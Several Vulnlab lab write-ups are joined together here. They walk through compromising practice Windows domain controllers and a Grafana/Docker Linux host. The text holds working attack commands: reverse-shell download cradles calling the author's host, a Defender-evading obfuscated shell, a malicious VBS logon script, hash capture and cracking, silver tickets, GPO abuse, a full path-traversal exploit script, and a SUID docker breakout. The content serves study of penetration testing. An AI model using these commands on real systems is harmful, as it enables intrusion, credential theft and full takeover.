Enumeration

NMAP Scan

sudo rustscan --ulimit 5000 -b 500 -a 10.10.125.15 -- -sC -sV -Pn | tee breach.nmap                                                                                                                                        
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍
---- SNIP ----
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-23 16:03:51Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-04-23T16:05:22+00:00; +2s from scanner time.
| ms-sql-info: 
|   10.10.125.15:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.125.15:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
 ---- SNIP ----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57892/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
58114/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
63079/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Information from NMAP scan

• We are dealing with a domain controller
• Port 80 is open
• MSSQL is present
• Rest are usual on a DC

SMB Enumeration

nxc smb 10.10.125.15 -u 'asd' -p '' --shares [0]
SMB         10.10.125.15    445    BREACHDC         [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.125.15    445    BREACHDC         [+] breach.vl\asd: 
SMB         10.10.125.15    445    BREACHDC         [*] Enumerated shares
SMB         10.10.125.15    445    BREACHDC         Share           Permissions     Remark
SMB         10.10.125.15    445    BREACHDC         -----           -----------     ------
SMB         10.10.125.15    445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.125.15    445    BREACHDC         C$                              Default share
SMB         10.10.125.15    445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.125.15    445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.125.15    445    BREACHDC         share           READ,WRITE      
SMB         10.10.125.15    445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.125.15    445    BREACHDC         Users           READ            

• share has guest read/write access
• We also have read access on Users share

Exploring share

smbclient.py breach.vl/fdf@10.10.125.15

• we can get 3 user names on transfer folder inside share
• The folder name Transfer sparks a hint , that users may interact with the files present inside.
• Since we have the write access, we can dig further on this.

LDAP Enumeration

• Anonymous bind is not enabled on LDAP

MS-SQL Enumeration

• Anonymous login is not enabled here as well

nxc mssql 10.10.125.15 -u '' -p ''                                                                                                                    [0]
MSSQL       10.10.125.15    1433   BREACHDC         [*] Windows 10.0 Build 20348 (name:BREACHDC) (domain:breach.vl)
MSSQL       10.10.125.15    1433   BREACHDC         [-] ERROR(BREACHDC\SQLEXPRESS): Line 1: Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.

Web enumeration

• No intresting leads there as well.

Deep dive on the obtained usernames

• Let's first check if the users are valid and any AS-REP roastable users

kerbrute userenum --dc 10.10.125.15 users -d breach.vl                                                                                                [0]

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/23/24 - Ronnie Flathers @ropnop

2024/04/23 21:52:13 >  Using KDC(s):
2024/04/23 21:52:13 >    10.10.125.15:88

2024/04/23 21:52:13 >  [+] VALID USERNAME:    claire.pope@breach.vl
2024/04/23 21:52:13 >  [+] VALID USERNAME:    julia.wong@breach.vl
2024/04/23 21:52:13 >  [+] VALID USERNAME:    diana.pope@breach.vl
2024/04/23 21:52:13 >  Done! Tested 3 usernames (3 valid) in 0.175 seconds

• All user names are valid and no AS-REP roastable users present
• Since there is no further hints on passwords, Let's try usernames as passwords, but no luck

nxc smb 10.10.125.15 -u users -p users --no-bruteforce --continue-on-success                                                                          [2]
SMB         10.10.125.15    445    BREACHDC         [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\claire.pope:claire.pope STATUS_LOGON_FAILURE 
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\diana.pope:diana.pope STATUS_LOGON_FAILURE 
SMB         10.10.125.15    445    BREACHDC         [-] breach.vl\julia.wong:julia.wong STATUS_LOGON_FAILURE 

Deep dive on transfer folder

• Since we have write access on this folder, lets drop an scf file to see if there are any interactions received on responder
• Start responder

sudo responder -v -I tun0

SCF file

[Shell]
Command=2
IconFile=\\10.8.2.13\share\v3l5.ico
[Taskbar]
Command=ToggleDesktop

• Lets upload it into transfer folder and see if we get interaction.
• Note that, the scf file should be at first.
• Unfortunately, no interaction was received. Not sure why?

Lets' try another vector uploading .URL file and we got an interaction on responder as user Julia.Wong

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.8.2.13\%USERNMAE%.icon
IconIndex=1

Initial Access

• Let's try to crack the hash using hashcat using rockyou.txt wordlist

  hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

• We have successfully cracked and obtained the clear text password.
  
• Verify the level of access using nxe
  
• We have additional read access to NETLOGON and SYSVOL
  • Enumerated shares again , but no interesting leads here
• No winrm, RDP access
• low privileged user access on mssql

Bloodhound

• Lets run bloodhound to get useful details about Domain objects.

bloodhound-python -d 'breach.vl' -u 'Julia.Wong' -p 'XXXXXXXXX' -c all -ns 10.10.86.42

• We found a kerberoastable user svc_mssql

Kerberoasting

• using Impacket , lets get the hash

GetUserSPNs.py -request -dc-ip 10.10.86.42 breach.vl/Julia.Wong:'XXXXXXXXXX'

hashcat -m 13100 --force -a 0 sqlsvchash /usr/share/wordlists/rockyou.txt

• Password cracked

• Check if we have administrator privileges over MSSQL DB using nxe

• Unfortunately, we still have only guest privileges on MSSQL db.

Generating Silver ticket

• Lets get a silver ticket as Administrator user, which will get us Administrative privileges over MSSQL DB
• We can use ticketer.py to generate the silver ticket. Required details are available on the bloodhound results
  • Domian SID: S-1-5-21-2330692793-3312915120-706255856
  • SPN: MSSQLSvc/breachdc.breach.vl:1433
  • NTLM hash - Since the password is known, we use any online tools to generate the hash.

ticketer.py -nthash 6959XXXXXXXXXXXXXXXX70E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn 'MSSQLSvc/breachdc.breach.vl:1433' Administrator

• export the ccache file - export KRB5CCNAME=Administrator.ccache
• Let's check if the ccache file is working

• We got the administrator access over MSSQL

  Shell Access

• Login using mssqlclinet.py

mssqlclient.py Administrator@BREACHDC.breach.vl -k -no-pass -windows-auth -dc-ip 10.10.86.42

• Enable XP cmd shell which allows us to run any command.

• Let's get a reverse shell. When i tried conpty shell, It gets blocked by the Defender.
• So, lets go with a simple Nishang's tcp reverse shell and invoke the reverse shell function within the script itself.
• For Obfuscation, I used - https://github.com/JoelGMSec/Invoke-Stealth
• Run below and rename the file, I renamed the obfuscated script to ps.txt

pwsh Invoke-Stealth.ps1 /opt/tools/Nishang/ps.ps1 -t PyFuscation

• We were able to get a reverse shell using that and bypassed defender successfully for now

xp_cmdshell powershell IEX(IWR http://10.8.2.13:8000/ps.txt -UseBasicParsing);

Privilege Escalation

• svc_mssql has Se-impersonate Privilege enabled.
• We can use JuicyPotatoNG.exe to abuse the Se-impersonate and achieve privilege escalation.
• We are able to get command execution as SYSTEM

./JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c powershell IEX(IWR http://10.8.2.13:8000/ps.txt -UseBasicParsing);"

Note: Before trying JuicyPotatoNG , I tried petitpotato.exe & godpotato.exe - I'm able to get a simple command execution, but not a reverse shell. Petitpotato closed execution before even fully downloading the reverse shell script & godpotato was very slow and broke the box

That's all for now. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn.

References

• https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#which-endpoint-protection-is-using-amsi
• https://github.com/antonioCoco/JuicyPotatoNG
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket

Summary

Initial access is through finding a valid set of credentials , which has extensive permission to write on a share that hosts a vb script. Replacing the script with a malicious one get's our initial shell as user Amelia.Griffiths. From there, We could enumerate AD further to find interesting ACLs that the user Amelia.Griffiths have on gpoadm user.

Further, gpoadm user have "GenericAll" rights over 2 GPOs, Using pyGPOAbuse, we can create and execute a scheduled task as SYSTEM user to add gpoadm to the local administrator group granting us the administrator access.

Enumeration

NMAP Scan

└─➜ sudo rustscan --ulimit 5000 -b 500 -a 10.10.110.149 -- -sC -sV -Pn | tee baby2.nmap                                                                                                                                                           [130]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.110.149:53
Open 10.10.110.149:88
Open 10.10.110.149:135
Open 10.10.110.149:139
Open 10.10.110.149:389
Open 10.10.110.149:445
Open 10.10.110.149:464
Open 10.10.110.149:593
Open 10.10.110.149:636
Open 10.10.110.149:3268
Open 10.10.110.149:3269
Open 10.10.110.149:3389
Open 10.10.110.149:9389

• Open ports - 53,88,389 are common in Domain Controller.
• Quick nxc scan confirm that, we are indeed dealing with a DC

• We also have anonymous login enabled and shares that have read and write privileges.

Service Enumeration

• Let's dig deeper on the SMB service.
• I'm going to use impacket's smbclient to connect and enumerate the file system

smbclient.py baby2.vl\sdaasda@10.10.110.149

Enumerating apps share

on smbclient

type `shares` to list all the shares
type `use <share_name>` - to select a share
tyep `mget *` - to download all files present

• 2 files - changelog and login.vbs.lnk files are present
• download both files

• CHANGELOG file hints about some automation activity

• Running strings on login.vbs.lnk shows that login.vbs script is most likely fetched from SYSVOL share. But we do not have access to SYSVOL share

Enumerating homes share

• homes share is where we have read and write privileges

• It looks like C:/Users folder as it reveals so many usernames

  

• Since there are many folder we can use nxe's spider_plus module to recursively look into the each folders and identify any interesting files

• Apparently there are no files available inside any of the folders

nxc smb 10.10.110.149 -u 'dsad' -p '' --shares -M spider_plus

Enumerating NETLOGON share

• Only 1 file present - login.vbs
• It looks like the automation script that changelog talked about

At this point, Since we have a writable share, Tried scf attack on the homes share and was unsuccessful as there were no interaction received on responder to grab hashes.

Initial Access

• With the usernames we got, let's check if they are valid and any AS-REP roastable users present

kerbrute userenum --dc 10.10.110.146 -d baby2.vl

• All users are valid and no AS-REP roastable users present
• Next step is to check the description of the users, but LDAP anonymous bind is not enabled which stops us from doing few more checks.
• With no hints about passwords, our only option is to try bruteforce with usernames as password.

nxc smb 10.10.101.190 -u usernames -p usernames --no-bruteforce --continue-on-success

• --no-bruteforce flag will bruteforce line 1 to line 1 and don't mix match the provided list& continue-on-sucess flag will not stop the bruteforce with one valid combination

Excellent ! we got 2 user accounts, with a valid combination

Enumerating Permissions

• Both the user has read & Write access to apps & docs shares. But It's always best to check the access manually on the shares as we cannot rely fully on the tool's output
• Since we have access to apps folder, I tried to replace login.vbs.lnk with a malicious lnk file so that we can get our required interaction on responder to capture the NET-NTLMv2 hash.
• But no luck there, It allows us to upload new files but unable to replace a existing file
• No interesting files under docs directory as well
• We are left with SYSVOL, Upon enumeration it has the login.vbs file which is present on the .lnk file as previously mentioned, surprisingly we are allowed to put/replace files in that share
• Now the initial access starting to takes shape, Since we have a vb script present, we can put vbs reverse shell inside the script to get our initial shell
• I have added a vbs wscript shell execution code into login.vbs to execute my ConPty reverse shell

Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell.exe IEX(IWR http://10.8.2.13:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.2.13 4444")

• Let's upload it into SYSVOL and wait for the callback
• Finally, we got our reverse shell as user Amelia.Griffiths

AD Enumeration

• As usual, the first step is to check the privileges whoami /priv and we don't see any privileges that we can abuse to escalate our privileges

• Using Powerview , Let's start enumerating the AD.
• Whenever I'm on an AD network, Below are the few things that I do no matter what, to get an overview about the field I'm in. Most of the time, these would give the quick wins or help us to understand the next possible steps
  • Enumerate Users
  • Enumerate Users description
  • Enumerate Computers
  • Enumerate Domain shares
  • Enumerate Groups
  • Enumerate Non-Default group's members
  • Enumerate Domain Admin group members
  • Enumerate Interesting ACLs
  • Enumerate Kerberostable users
  • Enumerate AS-REP roastable users
  • Enumerate LAPS Delegated groups
  • Enumerate Unconstrained delegation
  • Enumerate Users & Computers with Constrained delegation

Enumerating Interesting ACLs

Invoke-AClScanner -ResolveGUID

• Looks like gpoadm object has "GenericAll" access to group policies (snipped in screenshot)
• Also the legacy object has WriteDACL, WriteOwner access on gpoadm and gpo-management object

• Also we are part of legacy group, with that we can takeover gpoadm user and then can abuse GenericAll access on group policies to escalate our privileges

Privilege Escalation

Takeover gpoadm

• First step is to add GenericAll rights on gpoadm.

Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity "legacy" -Domain baby2.vl -Rights All -Verbose

• With the "GenericAll" rights, we can force change the password of gpoadm user

net user gpoadm Password1! /domain

• We have successfully changed the password

BloodHound Enumeration

• We already know that the gpoadm user has GenericAll rights over group policy objects. We'll also use bloodhound to look into it.
• Spin up Bloodhound CE

curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up

• Download the latest release of bloodhound.py which is compatible with the CE Edition

bloodhound-python -d 'baby2.vl' -u 'gpoadm' -p 'Password1!' -c all -ns 10.10.101.190

• Upload the results to bloodhound. we could see the same results visually that gpoadm user has Generic All access over 2 group policy objects

Abusing GPO

• As per recommendation by BloodHound CE , We'll use pyGPOAbuse.py. GPO-ID can be obtained from the bloodHound itself by selecting respective object

python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -gpo-id '6AC1786C-XXXXXXXXXXX-00C04FB984F9' -command 'net localgroup administrators gpoadm /add' -f -dc-ip 10.10.101.190

• Give few minutes for the scheduled task to run.
• We have successfully added gpoadm user to Administrators group

• Login using impacket's psexec

psexec.py gpoadm:'Password1!'@10.10.119.236

We are now logged in as nt authority\system. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn.

References

• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#writedacl--writeowner
• https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce
• https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py
• https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

User is allowed to run docker exec with sudo permissions. Abusing that we get into the running container as root. With root privileges inside container, It was possible to abuse the host system file mounts which allowed to copy SUID set bash binary into the path accessible by low level user on host system. we escalated to root shell using that.

Enumeration

NMAP Scan

sudo rustscan --ulimit 5000 -b 500 -a 10.10.125.191 -- -sC -sV -Pn | tee data.nmap 

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.125.191:22
Open 10.10.125.191:3000

---- SNIP ----

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:8f:c9:73:23:16:6f:b4:52:f8:f7:18:59:ee:c3:1a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcxzmL05K7qYzahTVCCDtxjdE43VbKj1ZetpkhVrIJrWFwdc48OiHYfxuLYXcFzQe/c3wyTHBM/dAEhyl+hVb9IVe46his4k07L3ItMa+H5JG5nfSshat32ICJB0zaFOyiQDVUfOJuOOJx/D4XKA1NPZMcbLS4HNepyvwOV2/KF5YqM+jmzW6cqeeyzvJ7u3GMDtOsWxHE1PpXZ9oSgJLqNHv4MDBFMR6OLvhMODLjCCbdtZYjpwzuKhHVw3bp6tT2CSRDN508Avc5R3DxqXHqIuIiJ9ub/0D96MiiWJHvhMyyBAClnLZ78PdjnYgOSie6NfuLdzUijWYf83gA3JQZ
|   256 38:e7:42:ab:c5:8d:ba:38:a4:a2:7d:60:05:38:bc:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA1FuX5IakjVw5PN32/nAmCYnjWyfkqG+MSaGEItFqRnHTXTxOx1dLC/CsybBnnWDVX85n13YU1o0yDmURJBtHo=
|   256 91:f4:8b:a0:24:ef:28:bd:0c:53:5c:21:21:18:ca:74 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINuJegkmYx37yx+tqqRY8JOPVt5u16MdLRbwT9ilsKka
3000/tcp open  ppp?    syn-ack ttl 62
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 21 Apr 2024 06:50:42 GMT
|     Content-Length: 29
|     href="/login">Found</a>.

---- SNIP ----

Information from NMAP Scan

• Port 22 is open, which can used used later if we get some valid credentials/ssh private keys
• Port 3000 is open - Based on the results, It appears to be a webpage with a login endpoint

Web Enumeration

• There is a grafana instance hosted and the version details are displayed on the login page

• Lets google the version number and see if there are any known vulnerabilities and exploits present
• Search results immediately points to CVE-2021-43798 & exploit on https://www.exploit-db.com/exploits/50581

• The CVE is an Unauthenticated File read & Directory Traversal vulnerability and affected versions are V8.0.0-beta1 through V8.3.0
• The exploit is written in python. Let's go through the code to understand how the exploit works

import requests
import argparse
import sys
from random import choice

plugin_list = [
    "alertlist",
    "annolist",
    "barchart",
    "bargauge",
    "candlestick",
    "cloudwatch",
    "dashlist",
    "elasticsearch",
    "gauge",
    "geomap",
    "gettingstarted",
    "grafana-azure-monitor-datasource",
    "graph",
    "heatmap",
    "histogram",
    "influxdb",
    "jaeger",
    "logs",
    "loki",
    "mssql",
    "mysql",
    "news",
    "nodeGraph",
    "opentsdb",
    "piechart",
    "pluginlist",
    "postgres",
    "prometheus",
    "stackdriver",
    "stat",
    "state-timeline",
    "status-histor",
    "table",
    "table-old",
    "tempo",
    "testdata",
    "text",
    "timeseries",
    "welcome",
    "zipkin"
]

def exploit(args):
    s = requests.Session()
    headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }

    while True:
        file_to_read = input('Read file > ')

        try:
            url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
            req = requests.Request(method='GET', url=url, headers=headers)
            prep = req.prepare()
            prep.url = url
            r = s.send(prep, verify=False, timeout=3)

            if 'Plugin file not found' in r.text:
                print('[-] File not found\n')
            else:
                if r.status_code == 200:
                    print(r.text)
                else:
                    print('[-] Something went wrong.')
                    return
        except requests.exceptions.ConnectTimeout:
            print('[-] Request timed out. Please check your host settings.\n')
            return
        except Exception:
            pass

def main():
    parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
    parser.add_argument('-H',dest='host',required=True, help="Target host")
    args = parser.parse_args()

    try:
        exploit(args)
    except KeyboardInterrupt:
        return

if __name__ == '__main__':
    main()
    sys.exit(0)

Code Explanation

• There is a list of known public plugins of grafana stored in the plugin_list
• Function exploit gets the file name as input which we are trying to read and makes a web request to http://IP:PORT/public/plugins/[any plugin name from the plugin_list]/../../../../../../../../../../../../../[file_to_read]
• If the plugin is present, then grafana instance will process the request and interpret sequence of ../../ as the valid file path and include the file in response.
• If the plugin is not present or the file name provided as input is not present, then it return error or blank response.

Initial Access

• This vulnerability allows us to read the files on the system. Since port 22 (SSH) is also open, Our obvious next step is to try get the users present through /etc/passwd file and search for ssh private keys on the respective home directory.
• Instead of using the exploit, I'm going to try manually exploit it with the help of Burp
• We'll copy all the plugins present in the code to a file, which we can use it on the Intruder module
• Start burp and capture one request
• Right click on the request and sent it to Intruder
• Configure Intruder to send the required request. $plugin_name$ will replace the plugin name that we have provided in the payload

• On starting the attack, There are so many successful results and we found multiple valid plugins for further exploitation

• There is a user grafana and the home directory is /home/grafana
• Let's send this request to repeater and see if this user has any SSH private keys
• SSH keys are generally present on the home directory of the user under .ssh hidden folder
• There are different types of SSH keys as well - The user could be using any one of the type (dsa | ecdsa | ecdsa-sk | ed25519 | ed25519-sk | rsa)
• The known files inside the .ssh folders are - id_rsa (or any of the above type) , known_hosts, authorized_keys etc.
• Unfortunately we could not find any SSH keys.

Digging deeper about Grafana

• Let's start checking the grafana documentation (https://grafana.com/docs/grafana/latest/setup-grafana/configure-grafana/) to see if we can find any location of configuration files, secret files if any
• The location of the configuration file stands out to be - /etc/grafana/grafana.ini
• Read the file to see if we can find any further hints

• Configuration file confirms that sqlite3 being used and the db file name is grafana.db

• Further checking the documentation shows the location of the database file

• We get a successful response accessing the db.

• Curl can be used to save the file
• Add --path-as-is and -o flag to save the output
  • --path-as-is flag is to tell curl to interpret ../ as is, otherwise it will skip it

curl --path-as-is http://10.10.125.191:3000/public/plugins/alertlist/../../../../../../../../../../../../../../var/lib/grafana/grafana.db -o grapfana.db

• The .db file can be opened using sqlitebrowser tool. Let's open it and explore the tables to find any sensitive information on it

sqlitebrowser grapfana.db  

• There is a table named user and it gives the user details

• It looks like the password is hashed. lets google to find out what type of hashing algorithm does grafana uses.
• Google search leads us to this code and this shows that the password are hashed using PBKDF2+SHA256

// EncodePassword encodes a password using PBKDF2.
func EncodePassword(password string, salt string) (string, error) {
    newPasswd := pbkdf2.Key([]byte(password), []byte(salt), 10000, 50, sha256.New)
    return hex.EncodeToString(newPasswd), nil
}

• one of the hashcat examples points to this mode
  
• We need to convert our password hash similar to above format
• A little research takes us to this link. Required format is sha256:<iteration>:<base64-salt>:<base64-password-hash> . We have all the required details from the table and the iteration is 10000, which is present on the above code
• As per the EncodePassword grafana code - the password output is hex, so we need to decode from hex and then convert to base64. For salt, we can directly encode to base64
• Final Output after conversion using cyberchef is `sha256:10000:TENXXXXXXXXbA==:3GvszLtX002vXXXXXXXXXXXXXXXXXXXXXXXXXxk1PjX1O1Hag=

• Run hashcat with mode 10900

hashcat -m 10900 --force "sha256:10000:TENXXXXXXXXbA==:3GvszLtX002vXXXXXXXXXXXXXXXXXXXXXXXXXxk1PjX1O1Hag=" /usr/share/wordlists/rockyou.txt

• Password cracked.

• Test if we can SSH using this credentials and we are successfully logged in as boris

Privilege Escalation

• Run sudo -l , reveals that we can run docker exec with root privileges

• In order to run docker exec , we need to know the container name or id. Unfortunately we don't have permission to run docker ps.
• Let's run linpeas to see if we can gather additional details

• On the running process, we could see the id of an running container. we can switch to the container using below command as a privileged user

sudo docker exec -it --privileged --user 0 e6ffXXXXXXXXXXXXXXXXXXXXXXXXXXX42339d4b81 /bin/bash

• Run linpeas again on the container and we can see there is an escalation path via mounts

• Run df -a, The host drive is present and we can mount it to get access to host file system as root

mount /dev/xvda1 /home/grafana/v3l5

• Now we have access to host file system, but still we are in the container.
• Since we have a low level user access on the host machine, we can set suid bit for bash binary inside the container and place it on /home/boris directory.
• The SUID set bash is accessible by boris which allows us to escalate to root

cp /home/grafana/v3l5/bin/bash /home/grafana/v3l5/home/boris/bash
cd /home/grafana/v3l5/home/boris/
chown root:root bash
chmod 4777 bash

• On host , we can see SUID is set for bash under /home/boris

• Run ./bash -p to get a root shell

References

• https://grafana.com/docs/grafana/latest/setup-grafana/configure-grafana/
• https://grafana.com/docs/grafana/latest/administration/back-up-grafana/
• https://www.exploit-db.com/exploits/50581
• https://juggernaut-sec.com/docker-breakout-lpe/

Hello Everyone ! This is an writeup of Vulnlab's Baby (easy) machine. For Initial access, LDAP is enumerated to identify users and initial setup password from the AD user object's description. One of the user's logon status was found to be STATUS_PASSWORD_MUST_CHANGE and the password is successfully reset. With the valid credentials, we got the initial shell using evil-winrm.

For Privilege Escalation, SeBackupPrivilege is abused to obtain the shadow copy of NTDS.dit and SYSTEM. With that, Domain users' hashes are dumped and used to become a domain administrator.

Enumeration

NMAP Scan

sudo rustscan --ulimit 5000 -b 500 -a 10.10.83.11 -- -sC -sV -Pn | tee baby.nmap
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
---- SNIP ----

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-20 09:18:24Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl

---- SNIP ----

| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: **BABY**
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: **baby.vl**
|   DNS_Computer_Name: **BabyDC.baby.vl**
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-20T09:19:15+00:00
|_ssl-date: 2024-04-20T09:19:56+00:00; -3s from scanner time.
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
